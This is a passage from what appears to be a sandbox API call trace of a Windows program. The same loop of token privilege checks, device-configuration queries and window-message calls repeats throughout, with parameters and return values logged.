(in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.955] SetLastError (dwErrCode=0x522) [0016.955] CloseHandle (hObject=0x114) returned 1 [0016.955] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.955] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.955] GetLastError () returned 0x578 [0016.955] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.955] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.955] GetCurrentThread () returned 0xfffffffe [0016.955] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.955] GetLastError () returned 0x3f0 [0016.955] GetCurrentProcess () returned 0xffffffff [0016.955] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.955] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.955] SetLastError (dwErrCode=0x522) [0016.955] CloseHandle (hObject=0x114) returned 1 [0016.955] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.955] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.955] GetLastError () returned 0x578 [0016.956] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.956] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.956] GetCurrentThread () returned 0xfffffffe [0016.956] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.956] GetLastError () returned 0x3f0 [0016.956] GetCurrentProcess () returned 0xffffffff [0016.956] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.956] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.956] SetLastError (dwErrCode=0x522) [0016.956] CloseHandle (hObject=0x114) returned 1 [0016.956] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.956] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.956] GetLastError () returned 0x578 [0016.956] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.956] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.956] GetCurrentThread () returned 0xfffffffe [0016.956] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.956] GetLastError () returned 0x3f0 [0016.956] GetCurrentProcess () returned 0xffffffff [0016.956] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.956] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.956] SetLastError (dwErrCode=0x522) [0016.956] CloseHandle (hObject=0x114) returned 1 [0016.956] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.956] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.956] GetLastError () returned 0x578 [0016.956] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.956] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.956] GetCurrentThread () returned 0xfffffffe [0016.956] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.956] GetLastError () returned 0x3f0 [0016.956] GetCurrentProcess () returned 0xffffffff [0016.956] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.956] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.956] SetLastError (dwErrCode=0x522) [0016.956] CloseHandle (hObject=0x114) returned 1 [0016.956] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.956] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.956] GetLastError () returned 0x578 [0016.956] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.956] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.956] GetCurrentThread () returned 0xfffffffe [0016.956] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.956] GetLastError () returned 0x3f0 [0016.957] GetCurrentProcess () returned 0xffffffff [0016.957] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.957] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.957] SetLastError (dwErrCode=0x522) [0016.957] CloseHandle (hObject=0x114) returned 1 [0016.957] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.957] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.957] GetLastError () returned 0x578 [0016.957] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.957] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.957] GetCurrentThread () returned 0xfffffffe [0016.957] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.957] GetLastError () returned 0x3f0 [0016.957] GetCurrentProcess () returned 0xffffffff [0016.957] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.957] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.957] SetLastError (dwErrCode=0x522) [0016.957] CloseHandle (hObject=0x114) returned 1 [0016.957] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.957] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.957] GetLastError () returned 0x578 [0016.957] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.957] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.957] GetCurrentThread () returned 0xfffffffe [0016.957] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.957] GetLastError () returned 0x3f0 [0016.957] GetCurrentProcess () returned 0xffffffff [0016.957] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.957] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.957] SetLastError (dwErrCode=0x522) [0016.957] CloseHandle (hObject=0x114) returned 1 [0016.957] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.957] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.957] GetLastError () returned 0x578 [0016.957] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.957] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.957] GetCurrentThread () returned 0xfffffffe [0016.957] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.957] GetLastError () returned 0x3f0 [0016.957] GetCurrentProcess () returned 0xffffffff [0016.957] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.958] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.958] SetLastError (dwErrCode=0x522) [0016.958] CloseHandle (hObject=0x114) returned 1 [0016.958] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.958] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.958] GetLastError () returned 0x578 [0016.958] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.958] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.958] GetCurrentThread () returned 0xfffffffe [0016.958] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.958] GetLastError () returned 0x3f0 [0016.958] GetCurrentProcess () returned 0xffffffff [0016.958] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.958] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.958] SetLastError (dwErrCode=0x522) [0016.958] CloseHandle (hObject=0x114) returned 1 [0016.958] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.958] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.958] GetLastError () returned 0x578 [0016.958] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.958] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.958] GetCurrentThread () returned 0xfffffffe [0016.958] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.958] GetLastError () returned 0x3f0 [0016.958] GetCurrentProcess () returned 0xffffffff [0016.958] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.958] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.958] SetLastError (dwErrCode=0x522) [0016.958] CloseHandle (hObject=0x114) returned 1 [0016.958] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.958] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.958] GetLastError () returned 0x578 [0016.958] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.958] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.958] GetCurrentThread () returned 0xfffffffe [0016.958] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.958] GetLastError () returned 0x3f0 [0016.958] GetCurrentProcess () returned 0xffffffff [0016.958] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.958] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.958] SetLastError (dwErrCode=0x522) [0016.958] CloseHandle (hObject=0x114) returned 1 [0016.958] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.959] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.959] GetLastError () returned 0x578 [0016.959] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.959] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.959] GetCurrentThread () returned 0xfffffffe [0016.959] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.959] GetLastError () returned 0x3f0 [0016.959] GetCurrentProcess () returned 0xffffffff [0016.959] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.959] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.959] SetLastError (dwErrCode=0x522) [0016.959] CloseHandle (hObject=0x114) returned 1 [0016.959] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.959] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.959] GetLastError () returned 0x578 [0016.959] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.959] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.959] GetCurrentThread () returned 0xfffffffe [0016.959] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.959] GetLastError () returned 0x3f0 [0016.959] GetCurrentProcess () returned 0xffffffff [0016.959] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.959] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.959] SetLastError (dwErrCode=0x522) [0016.959] CloseHandle (hObject=0x114) returned 1 [0016.959] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.959] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.959] GetLastError () returned 0x578 [0016.959] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.959] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.959] GetCurrentThread () returned 0xfffffffe [0016.959] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.959] GetLastError () returned 0x3f0 [0016.959] GetCurrentProcess () returned 0xffffffff [0016.959] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.959] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.959] SetLastError (dwErrCode=0x522) [0016.959] CloseHandle (hObject=0x114) returned 1 [0016.959] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.959] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.959] GetLastError () returned 0x578 [0016.960] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.960] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.960] GetCurrentThread () returned 0xfffffffe [0016.960] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.960] GetLastError () returned 0x3f0 [0016.960] GetCurrentProcess () returned 0xffffffff [0016.960] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.960] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.960] SetLastError (dwErrCode=0x522) [0016.960] CloseHandle (hObject=0x114) returned 1 [0016.960] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.960] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.960] GetLastError () returned 0x578 [0016.960] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.960] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.960] GetCurrentThread () returned 0xfffffffe [0016.960] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.960] GetLastError () returned 0x3f0 [0016.960] GetCurrentProcess () returned 0xffffffff [0016.960] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.960] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.960] SetLastError (dwErrCode=0x522) [0016.960] CloseHandle (hObject=0x114) returned 1 [0016.960] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.960] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.960] GetLastError () returned 0x578 [0016.960] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.960] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.960] GetCurrentThread () returned 0xfffffffe [0016.960] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.960] GetLastError () returned 0x3f0 [0016.960] GetCurrentProcess () returned 0xffffffff [0016.960] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.960] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.960] SetLastError (dwErrCode=0x522) [0016.960] CloseHandle (hObject=0x114) returned 1 [0016.960] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.960] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.960] GetLastError () returned 0x578 [0016.960] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.960] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.960] GetCurrentThread () returned 0xfffffffe [0016.960] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.960] GetLastError () returned 0x3f0 [0016.961] GetCurrentProcess () returned 0xffffffff [0016.961] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.961] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.961] SetLastError (dwErrCode=0x522) [0016.961] CloseHandle (hObject=0x114) returned 1 [0016.961] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.961] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.961] GetLastError () returned 0x578 [0016.961] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.961] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.961] GetCurrentThread () returned 0xfffffffe [0016.961] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.961] GetLastError () returned 0x3f0 [0016.961] GetCurrentProcess () returned 0xffffffff [0016.961] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.961] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.961] SetLastError (dwErrCode=0x522) [0016.961] CloseHandle (hObject=0x114) returned 1 [0016.961] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.961] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.961] GetLastError () returned 0x578 [0016.961] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.961] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.961] GetCurrentThread () returned 0xfffffffe [0016.961] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.961] GetLastError () returned 0x3f0 [0016.961] GetCurrentProcess () returned 0xffffffff [0016.961] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.961] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.961] SetLastError (dwErrCode=0x522) [0016.961] CloseHandle (hObject=0x114) returned 1 [0016.961] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.961] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.961] GetLastError () returned 0x578 [0016.961] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.961] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.961] GetCurrentThread () returned 0xfffffffe [0016.961] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.961] GetLastError () returned 0x3f0 [0016.961] GetCurrentProcess () returned 0xffffffff [0016.961] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.962] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.962] SetLastError (dwErrCode=0x522) [0016.962] CloseHandle (hObject=0x114) returned 1 [0016.962] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.962] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.962] GetLastError () returned 0x578 [0016.962] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.962] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.962] GetCurrentThread () returned 0xfffffffe [0016.962] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.962] GetLastError () returned 0x3f0 [0016.962] GetCurrentProcess () returned 0xffffffff [0016.962] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: 